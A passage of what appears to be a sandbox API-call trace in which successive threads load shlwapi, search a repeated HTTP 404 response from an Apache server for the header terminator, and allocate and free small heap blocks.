returned="\r\n\r\n\x08" [0110.337] GetProcessHeap () returned 0x620000 [0110.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0110.337] GetProcessHeap () returned 0x620000 [0110.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0110.337] GetProcessHeap () returned 0x620000 [0110.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 27 os_tid = 0x1244 [0111.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0111.787] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:14 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0111.787] GetProcessHeap () returned 0x620000 [0111.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0111.788] GetProcessHeap () returned 0x620000 [0111.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0111.788] GetProcessHeap () returned 0x620000 [0111.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 28 os_tid = 0x1260 [0113.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0113.700] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:16 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0113.700] GetProcessHeap () returned 0x620000 [0113.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0113.700] GetProcessHeap () returned 0x620000 [0113.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0113.700] GetProcessHeap () returned 0x620000 [0113.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 29 os_tid = 0x1240 [0115.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0115.850] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:18 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0115.850] GetProcessHeap () returned 0x620000 [0115.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0115.850] GetProcessHeap () returned 0x620000 [0115.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0115.850] GetProcessHeap () returned 0x620000 [0115.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 30 os_tid = 0x125c [0117.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0117.823] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:20 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0117.823] GetProcessHeap () returned 0x620000 [0117.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0117.823] GetProcessHeap () returned 0x620000 [0117.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0117.823] GetProcessHeap () returned 0x620000 [0117.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 31 os_tid = 0x1254 [0119.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0119.691] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:22 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0119.691] GetProcessHeap () returned 0x620000 [0119.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0119.691] GetProcessHeap () returned 0x620000 [0119.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0119.691] GetProcessHeap () returned 0x620000 [0119.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 32 os_tid = 0x124c [0121.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0121.352] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:24 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0121.352] GetProcessHeap () returned 0x620000 [0121.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0121.352] GetProcessHeap () returned 0x620000 [0121.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0121.352] GetProcessHeap () returned 0x620000 [0121.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 33 os_tid = 0xba8 [0123.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0123.247] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:25 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0123.247] GetProcessHeap () returned 0x620000 [0123.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0123.247] GetProcessHeap () returned 0x620000 [0123.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0123.247] GetProcessHeap () returned 0x620000 [0123.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 34 os_tid = 0x580 [0124.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0124.610] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:27 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0124.610] GetProcessHeap () returned 0x620000 [0124.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0124.610] GetProcessHeap () returned 0x620000 [0124.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0124.610] GetProcessHeap () returned 0x620000 [0124.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 35 os_tid = 0x1128 [0126.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0126.584] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:29 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0126.584] GetProcessHeap () returned 0x620000 [0126.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0126.585] GetProcessHeap () returned 0x620000 [0126.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0126.585] GetProcessHeap () returned 0x620000 [0126.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 36 os_tid = 0x1124 [0128.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0128.846] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:31 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0128.846] GetProcessHeap () returned 0x620000 [0128.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0128.847] GetProcessHeap () returned 0x620000 [0128.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0128.847] GetProcessHeap () returned 0x620000 [0128.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 37 os_tid = 0x558 [0130.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0130.795] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:33 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0130.795] GetProcessHeap () returned 0x620000 [0130.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0130.795] GetProcessHeap () returned 0x620000 [0130.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0130.795] GetProcessHeap () returned 0x620000 [0130.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 38 os_tid = 0x12e0 [0132.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0132.409] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:35 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0132.409] GetProcessHeap () returned 0x620000 [0132.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0132.409] GetProcessHeap () returned 0x620000 [0132.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0132.409] GetProcessHeap () returned 0x620000 [0132.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 39 os_tid = 0x570 [0134.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0134.421] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:36 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0134.421] GetProcessHeap () returned 0x620000 [0134.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0134.421] GetProcessHeap () returned 0x620000 [0134.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0134.421] GetProcessHeap () returned 0x620000 [0134.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 40 os_tid = 0x56c [0136.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0136.265] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:38 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0136.265] GetProcessHeap () returned 0x620000 [0136.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0136.265] GetProcessHeap () returned 0x620000 [0136.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0136.265] GetProcessHeap () returned 0x620000 [0136.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 41 os_tid = 0x540 [0138.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0138.111] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:40 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0138.111] GetProcessHeap () returned 0x620000 [0138.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0138.111] GetProcessHeap () returned 0x620000 [0138.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0138.111] GetProcessHeap () returned 0x620000 [0138.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 42 os_tid = 0x5f4 [0139.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0139.948] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:42 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0139.948] GetProcessHeap () returned 0x620000 [0139.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb80 [0139.948] GetProcessHeap () returned 0x620000 [0139.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb80 | out: hHeap=0x620000) returned 1 [0139.948] GetProcessHeap () returned 0x620000 [0139.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 43 os_tid = 0x12c4 [0141.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0141.530] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:44 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0141.531] GetProcessHeap () returned 0x620000 [0141.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0141.531] GetProcessHeap () returned 0x620000 [0141.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0141.531] GetProcessHeap () returned 0x620000 [0141.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 44 os_tid = 0x53c [0143.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0143.453] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:46 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0143.453] GetProcessHeap () returned 0x620000 [0143.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0143.453] GetProcessHeap () returned 0x620000 [0143.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0143.453] GetProcessHeap () returned 0x620000 [0143.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 45 os_tid = 0x398 [0145.624] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0145.624] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:47 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0145.624] GetProcessHeap () returned 0x620000 [0145.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0145.624] GetProcessHeap () returned 0x620000 [0145.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0145.624] GetProcessHeap () returned 0x620000 [0145.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 Thread: id = 46 os_tid = 0x1308 [0147.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0147.795] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:50 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0147.796] GetProcessHeap () returned 0x620000 [0147.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0147.796] GetProcessHeap () returned 0x620000 [0147.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0147.796] GetProcessHeap () returned 0x620000 [0147.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 47 os_tid = 0x12cc [0149.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0149.381] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:52 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0149.381] GetProcessHeap () returned 0x620000 [0149.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0149.381] GetProcessHeap () returned 0x620000 [0149.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0149.381] GetProcessHeap () returned 0x620000 [0149.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 48 os_tid = 0x1304 [0151.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0151.217] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:53 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0151.217] GetProcessHeap () returned 0x620000 [0151.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0151.217] GetProcessHeap () returned 0x620000 [0151.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0151.217] GetProcessHeap () returned 0x620000 [0151.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 49 os_tid = 0x12c8 [0153.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0153.171] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:55 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0153.171] GetProcessHeap () returned 0x620000 [0153.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0153.171] GetProcessHeap () returned 0x620000 [0153.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0153.171] GetProcessHeap () returned 0x620000 [0153.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 50 os_tid = 0x1324 [0155.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0155.036] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:57 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0155.036] GetProcessHeap () returned 0x620000 [0155.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0155.036] GetProcessHeap () returned 0x620000 [0155.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0155.036] GetProcessHeap () returned 0x620000 [0155.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 51 os_tid = 0x132c [0156.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0156.957] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:59 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0156.957] GetProcessHeap () returned 0x620000 [0156.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0156.957] GetProcessHeap () returned 0x620000 [0156.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0156.957] GetProcessHeap () returned 0x620000 [0156.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 52 os_tid = 0x1210 [0159.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0159.230] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:01 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0159.230] GetProcessHeap () returned 0x620000 [0159.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0159.230] GetProcessHeap () returned 0x620000 [0159.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0159.230] GetProcessHeap () returned 0x620000 [0159.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 53 os_tid = 0x11fc [0161.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0161.128] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:03 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0161.128] GetProcessHeap () returned 0x620000 [0161.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0161.128] GetProcessHeap () returned 0x620000 [0161.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0161.128] GetProcessHeap () returned 0x620000 [0161.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 54 os_tid = 0x1208 [0162.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0162.576] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:05 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0162.576] GetProcessHeap () returned 0x620000 [0162.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0162.576] GetProcessHeap () returned 0x620000 [0162.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0162.576] GetProcessHeap () returned 0x620000 [0162.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 55 os_tid = 0x1354 [0164.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0164.952] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:28:07 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0164.952] GetProcessHeap () returned 0x620000 [0164.952] RtlAllocateHeap (HeapHandle=0x620000, 